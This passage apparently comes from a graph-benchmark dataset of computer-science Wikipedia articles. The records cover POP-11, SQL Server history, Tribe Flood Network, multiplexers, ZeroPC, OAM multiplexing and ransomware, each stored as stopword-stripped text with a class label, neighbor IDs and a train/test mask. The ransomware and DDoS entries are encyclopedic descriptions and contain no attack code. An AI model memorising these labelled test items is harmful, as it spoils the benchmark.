    "text": "POP-11:pop-11 pop-11 reflective incrementally compiled programming language many features interpreted language core language poplog programming environment developed originally university sussex recently school computer science university birmingham hosts poplog website pop-11 evolution language pop-2 developed edinburgh university features open stack model like forth among others mainly procedural supports declarative language constructs including pattern matcher mostly used research teaching artificial intelligence although features sufficient many classes problems often used introduce symbolic programming techniques programmers conventional languages like pascal find pop syntax familiar lisp one pop-11 features supports first-class functions pop-11 core language poplog system availability compiler compiler subroutines run-time requirement incremental compilation gives ability support far wider range extensions would possible using macro facility made possible incremental compilers added prolog common lisp standard ml could added required support either mixed language development development second language without using pop-11 constructs made possible poplog used teachers researchers developers interested one languages successful product developed pop-11 clementine data-mining system developed isl spss bought isl decided port clementine c++ java eventually succeeded great effort perhaps loss flexibility provided use ai language pop-11 time available part expensive commercial package poplog since 1999 freely available part open source version poplog including various additional packages teaching libraries online version eliza using pop-11 available birmingham university sussex david young used pop-11 combination c fortran develop suite teaching interactive development tools image processing vision made available popvision extension poplog example simple pop-11 program prints one includes list processing examples using pop-11 pattern matcher makes relatively easy students learn develop sophisticated list-processing programs without treat patterns tree structures accessed 'head 'tail functions car cdr lisp found online introductory tutorial matcher heart simagent sim_agent toolkit powerful features toolkit linking pattern variables inline code variables would difficult implement without incremental compiler facilities category lisp programming language family category artificial intelligence category history computing united kingdom category science technology east sussex category university sussex",
    "neighbors": [
      3904,
      8421,
      6502,
      8262,
      2062,
      5395,
      5783,
      2808
    ],
    "mask": "Test"
  },
  {
    "node_id": 1964,
    "label": 1,
    "text": "History_of_Microsoft_SQL_Server:history microsoft sql server history microsoft sql server begins first microsoft sql server product sql server 1.0 16-bit server os/2 operating system 1989 extends current day june 12th 1988 microsoft joined ashton-tate sybase create variant sybase sql server ibm os/2 developed jointly microsoft released following year first version microsoft sql server served microsoft entry enterprise-level database market competing oracle ibm later sybase sql server 4.2 shipped 1992 bundled os/2 version 1.3 followed version 4.21 windows nt released alongside windows nt 3.1 sql server 6.0 first version designed nt include direction sybase time windows nt released july 1993 sybase microsoft parted ways pursued design marketing schemes microsoft negotiated exclusive rights versions sql server written microsoft operating systems 1996 sybase changed name product adaptive server enterprise avoid confusion microsoft sql server 1994 microsoft sql server carried three sybase copyright notices indication origin sql server 7.0 major rewrite c++ older sybase engine coded c. data pages enlarged 2k bytes 8k bytes extents thereby grew 16k bytes 64k bytes user mode scheduling ums introduced handle sql server threads better windows preemptive multi-threading also adding support fibers lightweight threads introduced nt 4.0 used avoid context switching sql server 7.0 also introduced multi-dimensional database product called sql olap services became analysis services sql server 2000 sql server 7.0 would last version run dec alpha platform although pre-release versions sql 2000 well windows 2000 compiled alpha canceled never commercially released sql server 2000 included modifications extensions sybase code base adding support ia-64 architecture mainstream support sql server 2005 legacy sybase code completely rewritten since release sql server 2000 advances made performance client ide tools several complementary systems packaged sql server 2005 include sql server 2000 also introduced many t-sql language enhancements table variables user-defined functions indexed views instead triggers cascading referential constraints basic xml support release service pack 3 microsoft also released first 64-bit version sql server itanium ia-64 platform confused x86-64 platform sql server relational engine sql agent ported itanium time client tools enterprise manager would still need run 32-bit x86 clients first release sql ia-64 version 8.00.760 build date february 6 2003 sql server 2005 formerly codenamed yukon released november 2005 included native support managing xml data addition relational data purpose defined codice_1 data type could used either data type database columns literals queries xml columns associated xsd schemas xml data stored verified schema xml converted internal binary data type stored database specialized indexing methods made available xml data xml data queried using xquery sql server 2005 added extensions t-sql language allow embedding xquery queries t-sql also defines new extension xquery called xml dml allows query-based modifications xml data sql server 2005 also allows database server exposed web services using tabular data stream tds packets encapsulated within soap protocol requests data accessed web services results returned xml common language runtime clr integration introduced version enabling one write sql code managed code clr relational data t-sql augmented error handling features try/catch support recursive queries ctes common table expressions sql server 2005 also enhanced new indexing algorithms syntax better error recovery systems data pages checksummed better error resiliency optimistic concurrency support added better performance permissions access control made granular query processor handles concurrent execution queries efficient way partitions tables indexes supported natively scaling database onto cluster easier sql clr introduced sql server 2005 let integrate .net framework sql server 2005 introduced multi-version concurrency control mvcc user facing features include new transaction isolation level called snapshot variation read committed isolation level based statement-level data snapshots sql server 2005 introduced mars multiple active results sets method allowing usage database connections multiple purposes sql server 2005 introduced dmvs dynamic management views specialized views functions return server state information used monitor health server instance diagnose problems tune performance sql server 2005 first version native support x64 platform service pack 1 sp1 sql server 2005 introduced database mirroring high availability option provides redundancy failover capabilities database level failover performed manually configured automatic failover automatic failover requires witness partner operating mode synchronous also known high-safety full safety database mirroring included first release sql server 2005 evaluation purposes prior sp1 enabled default supported microsoft extended support sql server 2005 ended april 12 2016 sql server 2008 formerly codenamed katmai released august 6 2008 announced sql server special interest group esri 2008 user conference august 6 2008 ed katibah spatial program manager microsoft aims make data management self-tuning self organizing self maintaining development sql server always technologies provide near-zero downtime sql server 2008 also includes support structured semi-structured data including digital media formats pictures audio video multimedia data current versions multimedia data stored blobs binary large objects generic bitstreams intrinsic awareness multimedia data allow specialized functions performed according paul flessner senior vice president server applications microsoft sql server 2008 data storage backend different varieties data xml email time/calendar file document spatial etc well perform search query analysis sharing synchronization across data types new data types include specialized date time types spatial data type location-dependent data better support unstructured semi-structured data provided using new filestream data type used reference file stored file system structured data metadata file stored sql server database whereas unstructured component stored file system files accessed via win32 file handling apis well via sql server using t-sql latter accesses file data blob backing restoring database backs restores referenced files well sql server 2008 also natively supports hierarchical data includes t-sql constructs directly deal without using recursive queries full-text search functionality integrated database engine according microsoft technical article simplifies management improves performance spatial data stored two types flat earth geometry planar data type represents geospatial data projected native spherical coordinate system plane round earth data type geography uses ellipsoidal model earth defined single continuous entity suffer singularities international dateline poles map projection zone edges approximately 70 methods available represent spatial operations open geospatial consortium simple features sql version 1.1 sql server includes better compression features also helps improving scalability enhanced indexing algorithms introduced notion filtered indexes also includes resource governor allows reserving resources certain users workflows also includes capabilities transparent encryption data tde well compression backups sql server 2008 supports ado.net entity framework reporting tools replication data definition built around entity data model sql server reporting services gain charting capabilities integration data visualization products dundas data visualization inc. acquired microsoft management side sql server 2008 includes declarative management framework allows configuring policies constraints entire database certain tables declaratively version sql server management studio included sql server 2008 supports intellisense sql queries sql server 2008 database engine sql server 2008 also makes databases available via windows powershell providers management functionality available cmdlets server running instances managed windows powershell final sql server 2008 service pack 10.00.6000 service pack 4 released september 30 2014 sql server 2008 r2 10.50.1600.1 formerly codenamed kilimanjaro announced teched 2009 released manufacturing april 21 2010 sql server 2008 r2 adds certain features sql server 2008 including master data management system branded master data services central management master data entities hierarchies also multi server management centralized console manage multiple sql server 2008 instances services including relational databases reporting services analysis services integration services sql server 2008 r2 includes number new services including powerpivot excel sharepoint master data services streaminsight report builder 3.0 reporting services add-in sharepoint data-tier function visual studio enables packaging tiered databases part application sql server utility named uc utility control point part amsm application multi-server management used manage multiple sql servers first sql server 2008 r2 service pack 10.50.2500 service pack 1 released july 11 2011 second sql server 2008 r2 service pack 10.50.4000 service pack 2 released july 26 2012 final sql server 2008 r2 service pack 10.50.6000 service pack 3 released september 26 2014 sql 2008 r2 would last version sql server run itanium ia-64 platform however x64 platform would continue force extended support sql server itanium would continue 2018 2011 professional association sql server pass summit october 11 microsoft announced next major version sql server codenamed denali would sql server 2012 released manufacturing march 6 2012 sql server 2012 service pack 1 released manufacturing november 9 2012 service pack 2 released manufacturing june 10 2014 announced last version natively support ole db instead prefer odbc native connectivity sql server 2012 new features enhancements include always sql server failover cluster instances availability groups provides set options improve database availability contained databases simplify moving databases instances new modified dynamic management views functions programmability enhancements including new spatial features metadata discovery sequence objects throw statement performance enhancements columnstore indexes well improvements online partition level operations security enhancements including provisioning setup new permissions improved role management default schema assignment groups sql server 2014 released manufacturing march 18 2014 released general public april 1 2014 build number 12.0.2000.8 release november 2013 two ctp revisions ctp1 ctp2 sql server 2014 provides new in-memory capability tables fit entirely memory also known hekaton whilst small tables may entirely resident memory versions sql server also may reside disk work involved reserving ram writing evicted pages disk loading new pages disk locking pages ram operated many tasks treating table guaranteed entirely resident memory much 'plumbing disk-based databases avoided disk-based sql server applications also provides ssd buffer pool extension improve performance cache ram spinning media sql server 2014 also enhances always hadr solution increasing readable secondaries count sustaining read operations upon secondary-primary disconnections provides new hybrid disaster recovery backup solutions microsoft azure enabling customers use existing skills on-premises version sql server take advantage microsoft global datacenters addition takes advantage new windows server 2012 windows server 2012 r2 capabilities database application scalability physical virtual environment microsoft provides three versions sql server 2014 downloading one runs microsoft azure sql server 2014 cab sql server 2014 iso sql server 2014 sp1 consisting primarily bugfixes released may 15 2015 sql server 2014 last version available x86/ia32 architecture official general availability ga release date sql server 2016 june 1 2016 rtm version 13.0.1601.5 sql server 2016 supported x64 processors longer supported x86 processors microsoft sql server 2017 recent version available microsoft launched sql server 2017 october 2nd 2017 along support linux",
    "neighbors": [
      5380,
      2952,
      270,
      1935,
      8976,
      1298,
      5523,
      11030,
      10145,
      10020,
      4135,
      8619,
      10157,
      6709,
      7234,
      3142,
      9286,
      5320,
      2383,
      83,
      853,
      1366,
      7134,
      479,
      5356,
      3821,
      9964,
      6770,
      8052,
      6775,
      3323,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 1965,
    "label": 4,
    "text": "Tribe_Flood_Network:tribe flood network tribe flood network tfn set computer programs conduct various ddos attacks icmp flood syn flood udp flood smurf attack first tfn initiated attacks described cert incident note 99-04 tfn2k written mixter security professional hacker based germany",
    "neighbors": [
      2018,
      9282,
      10852,
      2409,
      7337,
      6347,
      823,
      4495,
      7983,
      4883,
      2007,
      7515,
      2045,
      9727
    ],
    "mask": "Train"
  },
  {
    "node_id": 1966,
    "label": 4,
    "text": "Relying_party:relying party relying party rp computer term used refer server providing access secure software application claims-based applications claim statement entity makes order establish access also called relying party rp applications rps also called “ claims aware applications ” “ claims-based applications ” web applications services rps security token service sts rp redirects clients sts authenticates client issues security token containing set claims client identity present rp instead application authenticating user directly rp extract claims token use identity related tasks openid standard defines situation whereby cooperating site act rp allowing user log multiple sites using one set credentials user benefits share login credentials multiple sites operators cooperating site avoid develop login mechanism application demonstrating concept relying party software running mobile devices used granting user access software applications also secure building access without user enter credentials time",
    "neighbors": [
      8227,
      8174,
      8807
    ],
    "mask": "Test"
  },
  {
    "node_id": 1967,
    "label": 5,
    "text": "Multiplexer:multiplexer electronics multiplexer mux device selects several analog digital input signals forwards single output line multiplexer formula_1 inputs formula_2 select lines used select input line send output multiplexers mainly used increase amount data sent network within certain amount time bandwidth multiplexer also called data selector multiplexers also used implement boolean functions multiple variables electronic multiplexer makes possible several signals share one device resource example one a/d converter one communication line instead one device per input signal conversely demultiplexer demux device taking single input selecting signals output compatible mux connected single input shared selection line multiplexer often used complementary demultiplexer receiving end electronic multiplexer considered multiple-input single-output switch demultiplexer single-input multiple-output switch schematic symbol multiplexer isosceles trapezoid longer parallel side containing input pins short parallel side containing output pin schematic right shows 2-to-1 multiplexer left equivalent switch right formula_3 wire connects desired input output one use multiplexers economizing connections single channel connecting multiplexer single output demultiplexer single input image right demonstrates benefit case cost implementing separate channels data source higher cost inconvenience providing multiplexing/demultiplexing functions receiving end data link complementary demultiplexer usually required break single data stream back original streams cases far end system may functionality greater simple demultiplexer demultiplexing still occurs technically may never implemented discretely would typical multiplexer serves number ip network users feeds directly router immediately reads content entire link routing processor demultiplexing memory converted directly ip sections often multiplexer demultiplexer combined together single piece equipment conveniently referred multiplexer circuit elements needed ends transmission link communications systems transmit directions analog circuit design multiplexer special type analog switch connects one signal selected several inputs single output digital circuit design selector wires digital value case 2-to-1 multiplexer logic value 0 would connect formula_4 output logic value 1 would connect formula_5 output larger multiplexers number selector pins equal formula_6 formula_7 number inputs example 9 16 inputs would require fewer 4 selector pins 17 32 inputs would require fewer 5 selector pins binary value expressed selector pins determines selected input pin 2-to-1 multiplexer boolean equation formula_8 formula_9 two inputs formula_10 selector input formula_11 output expressed truth table simpler notation tables show formula_13 formula_14 formula_15 formula_16 straightforward realization 2-to-1 multiplexer would need 2 gates gate gate mathematically correct direct physical implementation would prone race conditions require additional gates suppress larger multiplexers also common stated require formula_6 selector pins formula_2 inputs common sizes 4-to-1 8-to-1 16-to-1 since digital logic uses binary values powers 2 used 4 8 16 maximally control number inputs given number selector inputs boolean equation 4-to-1 multiplexer following 4-to-1 multiplexer constructed 3-state buffers gates gates acting decoder subscripts formula_20 inputs indicate decimal value binary control inputs input let larger multiplexers constructed using smaller multiplexers chaining together example 8-to-1 multiplexer made two 4-to-1 one 2-to-1 multiplexers two 4-to-1 multiplexer outputs fed 2-to-1 selector pins 4-to-1 put parallel giving total number selector inputs 3 equivalent 8-to-1 7400 series several ics contain multiplexer demultiplexers take one data input number selection inputs several outputs forward data input one outputs depending values selection inputs demultiplexers sometimes convenient designing general purpose logic demultiplexer input always true demultiplexer acts decoder means function selection bits constructed logically or-ing correct set outputs x input selector b outputs formula_21 formula_22 7400 series several ics contain demultiplexer multiplexers also used programmable logic devices specifically implement boolean functions boolean function n variables one result implemented multiplexer n selector inputs variables connected selector inputs function result 0 1 possible combination selector inputs connected corresponding data input especially useful situations cost factor modularity ease modification one variables example also available inverted multiplexer n -1 selector inputs sufficient data inputs connected 0 1 according desired output combination selector inputs",
    "neighbors": [
      9218,
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      6184,
      3630,
      10799,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      10833,
      594,
      1631,
      3168,
      1122,
      3175,
      8815,
      630,
      8822,
      6268,
      3197,
      646,
      7313,
      6290,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      5809,
      2226,
      3762,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      5321,
      9932,
      5329,
      5334,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      2339,
      6950,
      3886,
      2863,
      309,
      8501,
      5948,
      4928,
      7490,
      8514,
      4423,
      6476,
      2383,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      5472,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      10669,
      2480,
      2992,
      2994,
      10675,
      1461,
      1463,
      7607,
      1977,
      4030,
      453,
      3014,
      466,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      4594,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 1968,
    "label": 7,
    "text": "ZeroPC:zeropc zeropc commercial webtop developed zerodesktop inc. located san mateo california zeropc called personal cloud os mimicked look feel functionality desktop environment real operating system software launched september 2011 disrupt sf 2011 event recently selected finalist sxsw 2012 innovative web technology category zeropc web-based required java applet operate bundled productivity tool thinkfree web applications found zeropc built java back end features included drag-and-drop functionality cloud dashboard personal cloud storage meta services zeropc belonged category services intended turn web full-fledged platform using web services foundation along presentation technologies replicated experience desktop applications users zeropc aggregates content users easily access transfer share whatever content want using internet browser anywhere anytime device meta-cloud layer supports dropbox box sugarsync onedrive 4shared google drive evernote picasa flickr instagram facebook twitter photobucket zeropc cloud os platform also provides extensive apis ios android app developers features found zeropc file sharing webmail cloud content navigator instant messenger sticky note audio/video player office productivity applications zeropc 2.0 platform ran aws free paid users platform licensable telco isv commercial purpose clients sfr sk telecom hancom others june 1 2017 zeropc servers switched completely zeropc longer service since parent company ncomputing launched virtual desktop service cloud aws public zeropc web desktop compatible mac os x microsoft windows platforms certified operate safari 6.0 firefox 15.0.1 google chrome 22.0.1229.79 internet explorer 8 9 zeropc front end user interface executes entirely within internet browser see uses html features html5 javascript ajax optional java plug-in communication zeropc front end user interface zeropc back end servers encrypted using ssl https protocol furthermore content stored zeropc server-side repository also encrypted using 256-bit advanced encryption standard aes-256 amazon web services simple storage service s3 zeropc users could connect zeropc profile storage services dropbox box connection allows zeropc user fully manage content stored storage services establish connection zeropc rigorously adhered oauth implementation provided target storage service upon completion oauth process zeropc stores relevant access token user profile token along sensitive password related data encrypted using aes 256-bit key size noted zeropc platform hosted amazon web services infrastructure available general consumer user allowed sign selecting one three account plans including no-cost option zeropc could also white-labeled organizations wishing provide functionality users white-label options include managed hosting amazon web services infrastructure also installation within organization infrastructure zeropc infrastructure provided user access content features several different ways described article user access information signing zeropc web desktop additionally zeropc offers native applications designed run popular mobile devices including smartphones tablets zeropc founded chief executive officer young song entrepreneur previously founded ncomputing 60 million venture-backed company also co-founded emachines inc. low-cost computer brand later acquired gateway",
    "neighbors": [
      3462,
      6797,
      4623,
      7248,
      7983,
      5078,
      10168
    ],
    "mask": "None"
  },
  {
    "node_id": 1969,
    "label": 5,
    "text": "Orbital_angular_momentum_multiplexing:orbital angular momentum multiplexing orbital angular momentum oam multiplexing physical layer method multiplexing signals carried electromagnetic waves using orbital angular momentum electromagnetic waves distinguish different orthogonal signals orbital angular momentum one two forms angular momentum light oam distinct confused light spin angular momentum spin angular momentum light offers two orthogonal quantum states corresponding two states circular polarization demonstrated equivalent combination polarization multiplexing phase shifting oam hand relies extended beam light higher quantum degrees freedom come extension oam multiplexing thus access potentially unbounded set states offer much larger number channels subject constraints real-world optics although oam multiplexing promises significant improvements bandwidth used concert existing modulation multiplexing schemes still experimental technique far demonstrated laboratory following early claim oam exploits new quantum mode information propagation technique become controversial however nowadays understood particular form tightly modulated mimo multiplexing strategy obeying classical information theoretic bounds oam multiplexing demonstrated using light beams free space early 2004 since research oam proceeded two areas radio frequency optical transmission experiment 2011 demonstrated oam multiplexing two incoherent radio signals distance 442 m. claimed oam improve achieved conventional linear-momentum based rf systems already use mimo since theoretical work suggests radio frequencies conventional mimo techniques shown duplicate many linear-momentum properties oam-carrying radio beam leaving little extra performance gain november 2012 reports disagreement basic theoretical concept oam multiplexing radio frequencies research groups tamburini thide many different camps communications engineers physicists declaring belief oam multiplexing implementation mimo others holding assertion oam multiplexing distinct experimentally confirmed phenomenon 2014 group researchers described implementation communication link 8 millimetre-wave channels multiplexed using combination oam polarization-mode multiplexing achieve aggregate bandwidth 32 gbit/s distance 2.5 metres results agree well predictions severely limited distances made edfors et al industrial interest long-distance microwave oam multiplexing seems diminishing since 2015 original promoters oam-based communication radio frequencies including siae microelettronica published theoretical investigation showing real gain beyond traditional spatial multiplexing terms capacity overall antenna occupation oam multiplexing used optical domain 2012 researchers demonstrated oam-multiplexed optical transmission speeds 2.5 tbits/s using 8 distinct oam channels single beam light short free-space path roughly one metre work ongoing applying oam techniques long-range practical free-space optical communication links oam multiplexing implemented existing long-haul optical fiber systems since systems based single-mode fibers inherently support oam states light instead few-mode multi-mode fibers need used additional problem oam multiplexing implementation caused mode coupling present conventional fibers cause changes spin angular momentum modes normal conditions changes orbital angular momentum fibers bent stressed mode instability direct-detection oam multiplexing yet realized long-haul communications 2012 transmission oam states 97 purity 20 meters special fibers demonstrated researchers boston university later experiments shown stable propagation modes distances 50 meters improvements distance subject ongoing work ongoing research making oam multiplexing work future fibre-optic transmission systems includes possibility using similar techniques used compensate mode rotation optical polarization multiplexing alternative direct-detection oam multiplexing computationally complex coherent-detection mimo digital signal processing dsp approach used achieve long-haul communication strong mode coupling suggested beneficial coherent-detection-based systems paper bozinovic et al published science 2013 claims successful demonstration oam-multiplexed fiber-optic transmission system 1.1 km test path test system capable using 4 different oam channels simultaneously using fiber vortex refractive-index profile also demonstrated combined oam wdm using apparatus using two oam modes 2014 articles g. milione et al h. huang et al claimed first successful demonstration oam-multiplexed fiber-optic transmission system 5 km conventional optical fiber i.e. optical fiber circular core graded index profile contrast work bozinovic et al. used custom optical fiber vortex refractive-index profile work g. milione et al h. huang et al showed oam multiplexing could used commercially available optical fibers using digital mimo post-processing correct mode mixing within fiber method sensitive changes system change mixing modes propagation changes bending fiber requires substantial computation resources scale larger numbers independent modes shows great promise 2018 zengji yue haoran ren shibiao wei jiao lin min gu royal melbourne institute technology miniaturised technology shrinking size large dinner table small chip could integrated communications networks chip could predict increase capacity fibre-optic cables least 100-fold likely higher technology developed",
    "neighbors": [
      3847,
      2057,
      1550,
      2458,
      5020,
      5664,
      7723,
      11181,
      2994,
      1083,
      448,
      7490,
      3140,
      7108,
      11591,
      5321,
      7498,
      9296,
      119,
      3168,
      1121,
      4068,
      7400,
      1650,
      2802,
      3959
    ],
    "mask": "Test"
  },
  {
    "node_id": 1970,
    "label": 4,
    "text": "Ransomware:ransomware ransomware type malware cryptovirology threatens publish victim data perpetually block access unless ransom paid simple ransomware may lock system way difficult knowledgeable person reverse advanced malware uses technique called cryptoviral extortion encrypts victim files making inaccessible demands ransom payment decrypt properly implemented cryptoviral extortion attack recovering files without decryption key intractable problem – difficult trace digital currencies ukash bitcoin cryptocurrency used ransoms making tracing prosecuting perpetrators difficult ransomware attacks typically carried using trojan disguised legitimate file user tricked downloading opening arrives email attachment however one high-profile example wannacry worm travelled automatically computers without user interaction starting around 2012 use ransomware scams grown internationally 181.5 million ransomware attacks first six months 2018 marks 229 increase time frame 2017 june 2014 vendor mcafee released data showing collected double number samples ransomware quarter quarter previous year cryptolocker particularly successful procuring estimated us 3 million taken authorities cryptowall estimated us federal bureau investigation fbi accrued us 18 million june 2015 concept file-encrypting ransomware invented implemented young yung columbia university presented 1996 ieee security privacy conference called cryptoviral extortion inspired fictional facehugger movie alien cryptoviral extortion following three-round protocol carried attacker victim symmetric key randomly generated assist victims point attacker private key exposed victims victim need send small ciphertext encrypted symmetric-cipher key attacker ransomware attacks typically carried using trojan entering system example malicious attachment embedded link phishing email vulnerability network service program runs payload locks system fashion claims lock system e.g. scareware program payloads may display fake warning purportedly entity law enforcement agency falsely claiming system used illegal activities contains content pornography pirated media payloads consist simply application designed lock restrict system payment made typically setting windows shell even modifying master boot record and/or partition table prevent operating system booting repaired sophisticated payloads encrypt files many using strong encryption encrypt victim files way malware author needed decryption key payment virtually always goal victim coerced paying ransomware removed either supplying program decrypt files sending unlock code undoes payload changes attacker may simply take money without returning victim files attacker best interest perform decryption agreed since victims stop sending payments becomes known serve purpose key element making ransomware work attacker convenient payment system hard trace range payment methods used including wire transfers premium-rate text messages pre-paid voucher services paysafecard digital currency bitcoin 2016 survey commissioned citrix claimed larger businesses holding bitcoin contingency plans first known malware extortion attack aids trojan written joseph popp 1989 design failure severe necessary pay extortionist payload hid files hard drive encrypted names displayed message claiming user license use certain piece software expired user asked pay us 189 pc cyborg corporation order obtain repair tool even though decryption key could extracted code trojan trojan also known pc cyborg popp declared mentally unfit stand trial actions promised donate profits malware fund aids research idea abusing anonymous cash systems safely collect ransom human kidnapping introduced 1992 sebastiaan von solms david naccache electronic money collection method also proposed cryptoviral extortion attacks von solms-naccache scenario newspaper publication used since bitcoin ledgers exist time paper written notion using public key cryptography data kidnapping attacks introduced 1996 adam l. young moti yung young yung critiqued failed aids information trojan relied symmetric cryptography alone fatal flaw decryption key could extracted trojan implemented experimental proof-of-concept cryptovirus macintosh se/30 used rsa tiny encryption algorithm tea hybrid encrypt victim data since public key crypto used cryptovirus contains encryption key attacker keeps corresponding private decryption key private young yung original experimental cryptovirus victim send asymmetric ciphertext attacker deciphers returns symmetric decryption key contains victim fee long electronic money existed young yung proposed electronic money could extorted encryption well stating virus writer effectively hold money ransom half given even e-money previously encrypted user use user gets encrypted cryptovirus referred attacks cryptoviral extortion overt attack part larger class attacks field called cryptovirology encompasses overt covert attacks cryptoviral extortion protocol inspired parasitic relationship h. r. giger facehugger host movie alien examples extortionate ransomware became prominent may 2005 mid-2006 trojans gpcode troj.ransom.a archiveus krotten cryzip mayarchive began utilizing sophisticated rsa encryption schemes ever-increasing key-sizes gpcode.ag detected june 2006 encrypted 660-bit rsa public key june 2008 variant known gpcode.ak detected using 1024-bit rsa key believed large enough computationally infeasible break without concerted distributed effort encrypting ransomware returned prominence late 2013 propagation cryptolocker—using bitcoin digital currency platform collect ransom money december 2013 zdnet estimated based bitcoin transaction information 15 october 18 december operators cryptolocker procured us 27 million infected users cryptolocker technique widely copied months following including cryptolocker 2.0 thought related cryptolocker cryptodefense initially contained major design flaw stored private key infected system user-retrievable location due use windows built-in encryption apis august 2014 discovery trojan specifically targeting network-attached storage devices produced synology january 2015 reported ransomware-styled attacks occurred individual websites via hacking ransomware designed target linux-based web servers microsoft malware protection center identified trend away wsf files favour lnk files powershell scripting lnk shortcut files install locky ransomware automating infection operations rather relying traditional user downloads wsf files—all made possible universal powershell windows application unfortunately cybercriminals able leverage powershell attacks years recent report application found involved nearly 40 endpoint security incidents attackers finding weaknesses windows operating system years ’ clear ’ something problematic powershell scripting ransomware strains used proxies tied tor hidden services connect command control servers increasing difficulty tracing exact location criminals furthermore dark web vendors increasingly started offer technology service symantec classified ransomware dangerous cyber threat august 2010 russian authorities arrested nine individuals connected ransomware trojan known winlock unlike previous gpcode trojan winlock use encryption instead winlock trivially restricted access system displaying pornographic images asked users send premium-rate sms costing around us 10 receive code could used unlock machines scam hit numerous users across russia neighbouring countries—reportedly earning group us 16 million 2011 ransomware trojan surfaced imitated windows product activation notice informed users system windows installation re-activated due victim fraud online activation option offered like actual windows activation process unavailable requiring user call one six international numbers input 6-digit code malware claimed call would free routed rogue operator country high international phone rates placed call hold causing user incur large international long distance charges february 2013 ransomware trojan based stamp.ek exploit kit surfaced malware distributed via sites hosted project hosting services sourceforge github claimed offer fake nude pics celebrities july 2013 os x-specific ransomware trojan surfaced displays web page accuses user downloading pornography unlike windows-based counterparts block entire computer simply exploits behaviour web browser frustrate attempts close page normal means july 2013 21-year-old man virginia whose computer coincidentally contain pornographic photographs underage girls conducted sexualized communications turned police receiving deceived ransomware purporting fbi message accusing possessing child pornography investigation discovered incriminating files man charged child sexual abuse possession child pornography converse ransomware cryptovirology attack invented adam l. young threatens publish stolen information victim computer system rather deny victim access leakware attack malware exfiltrates sensitive host data either attacker alternatively remote instances malware attacker threatens publish victim data unless ransom paid attack presented west point 2003 summarized book malicious cryptography follows attack differs extortion attack following way extortion attack victim denied access valuable information pay get back attack presented victim retains access information disclosure discretion computer virus attack rooted game theory originally dubbed non-zero sum games survivable malware attack yield monetary gain cases malware acquires access information may damage victim user organization e.g. reputational damage could result publishing proof attack success increased popularity ransomware pc platforms ransomware targeting mobile operating systems also proliferated typically mobile ransomware payloads blockers little incentive encrypt data since easily restored via online synchronization mobile ransomware typically targets android platform allows applications installed third-party sources payload typically distributed apk file installed unsuspecting user may attempt display blocking message top applications another used form clickjacking cause user give device administrator privileges achieve deeper access system different tactics used ios devices exploiting icloud accounts using find iphone system lock access device ios 10.3 apple patched bug handling javascript pop-up windows safari exploited ransomware websites recently shown ransomware may also target arm architectures like found various internet-of-things iot devices industrial iot edge devices august 2019 researchers demonstrated possible infect dslr cameras ransomware digital cameras often use picture transfer protocol ptp standard protocol used transfer files researchers found possible exploit vulnerabilities protocol infect target camera ransomware execute arbitrary code attack presented defcon security conference las vegas proof concept attack actual armed malware 2012 major ransomware trojan known reveton began spread based citadel trojan based zeus trojan payload displays warning purportedly law enforcement agency claiming computer used illegal activities downloading unlicensed software child pornography due behaviour commonly referred police trojan warning informs user unlock system would pay fine using voucher anonymous prepaid cash service ukash paysafecard increase illusion computer tracked law enforcement screen also displays computer ip address versions display footage victim webcam give illusion user recorded reveton initially began spreading various european countries early 2012 variants localized templates branded logos different law enforcement organizations based user country example variants used united kingdom contained branding organizations metropolitan police service police national e-crime unit another version contained logo royalty collection society prs music specifically accused user illegally downloading music statement warning public malware metropolitan police clarified would never lock computer way part investigation may 2012 trend micro threat researchers discovered templates variations united states canada suggesting authors may planning target users north america august 2012 new variant reveton began spread united states claiming require payment 200 fine fbi using moneypak card february 2013 russian citizen arrested dubai spanish authorities connection crime ring using reveton ten individuals arrested money laundering charges august 2014 avast software reported found new variants reveton also distribute password-stealing malware part payload encrypting ransomware reappeared september 2013 trojan known cryptolocker generated 2048-bit rsa key pair uploaded turn command-and-control server used encrypt files using whitelist specific file extensions malware threatened delete private key payment bitcoin pre-paid cash voucher made within 3 days infection due extremely large key size uses analysts affected trojan considered cryptolocker extremely difficult repair even deadline passed private key could still obtained using online tool price would increase 10 btc—which cost approximately us 2300 november 2013 cryptolocker isolated seizure gameover zeus botnet part operation tovar officially announced u.s. department justice 2 june 2014 department justice also publicly issued indictment russian hacker evgeniy bogachev alleged involvement botnet estimated least us 3 million extorted malware shutdown september 2014 wave ransomware trojans surfaced first targeted users australia names cryptowall cryptolocker cryptolocker 2.0 unrelated original cryptolocker trojans spread via fraudulent e-mails claiming failed parcel delivery notices australia post evade detection automatic e-mail scanners follow links page scan malware variant designed require users visit web page enter captcha code payload actually downloaded preventing automated processes able scan payload symantec determined new variants identified cryptolocker.f unrelated original cryptolocker due differences operation notable victim trojans australian broadcasting corporation live programming television news channel abc news 24 disrupted half hour shifted melbourne studios due cryptowall infection computers sydney studio another trojan wave torrentlocker initially contained design flaw comparable cryptodefense used keystream every infected computer making encryption trivial overcome however flaw later fixed late-november 2014 estimated 9,000 users infected torrentlocker australia alone trailing turkey 11,700 infections another major ransomware trojan targeting windows cryptowall first appeared 2014 one strain cryptowall distributed part malvertising campaign zedo ad network late-september 2014 targeted several major websites ads redirected rogue websites used browser plugin exploits download payload barracuda networks researcher also noted payload signed digital signature effort appear trustworthy security software cryptowall 3.0 used payload written javascript part email attachment downloads executables disguised jpg images evade detection malware creates new instances explorer.exe svchost.exe communicate servers encrypting files malware also deletes volume shadow copies installs spyware steals passwords bitcoin wallets fbi reported june 2015 nearly 1,000 victims contacted bureau internet crime complaint center report cryptowall infections estimated losses least 18 million recent version cryptowall 4.0 enhanced code avoid antivirus detection encrypts data files also file names fusob one major mobile ransomware families april 2015 march 2016 56 percent accounted mobile ransomware fusob like typical mobile ransomware employs scare tactics extort people pay ransom program pretends 